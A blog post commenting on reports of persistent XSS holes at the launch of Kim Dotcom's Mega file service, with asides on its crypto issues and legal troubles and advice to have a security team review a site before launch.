Any new site, not just Mega is going to have security holes, and reports have surfaced in Twitter, Reddit, and over on ZDNet that Mega has a couple of persistent XSS security holes that are going to make users days a little bit harder. Beyond the crypto issues that you can read on ZDNet, persistent XSS could allow a hacker to steal your Public/Private keys generated by the system at the worst case, in the best case, make it so that you cannot get to your data at all.
I am more interested in the XSS Security issues, read the ZDNet article for the crypto and password issue. You should read Torrent Freaks article on Mega being sued and people trying to cut off the payment processor for a system that is barely 48 hours old. Whatever happens, the launch of Mega for all its hype and gold, Kim Dot Com is a person who is always going to be beat on, even if he tries to open up a good file locker system. Someone is always going to take exception to anything he does. The payment processor issue will be years in the making.
But on the XSS issue, this is much more interesting, you could not have a high powered highly visible launch like Mega without attracting attention of people who are going to push the envelope and try to see what they can get away with. On the day of launch, on January 19th, twitter started showing that people have been able to do a persistent XSS attack against Mega. Unfortunately the owner of the picture below is unknown (drop me a note so you can get credit for it, this picture is all over the internet).
The Twitter Feed is just as interesting but tapers off as reports of issues being fixed start hitting the news and social news services.
The interesting part of all this is that with such a wide visibility, they should have hired a trained security team to at least help them out before they went live. That is very dangerous not to have someone doing security evaluation of the code sets involved with a site like this. The good part is that Mega, and Kim Dot Com especially has a large amount of fans that would be willing to help them out for free. The bad part is that Kim Dot Com has a lot of people who hate him for Mega Upload, and would happily take advantage of a security hole like this to compromise or shut down the new Mega system. The question is who is going to get there first.
Just some advice for what it is worth, if you are doing any site launch, let alone a high visibility launch like Mega did this week, have a security team, a good security team go through your system first and identify the easy security holes.
(Cross-posted @ Managing Intellectual Property & IT Security)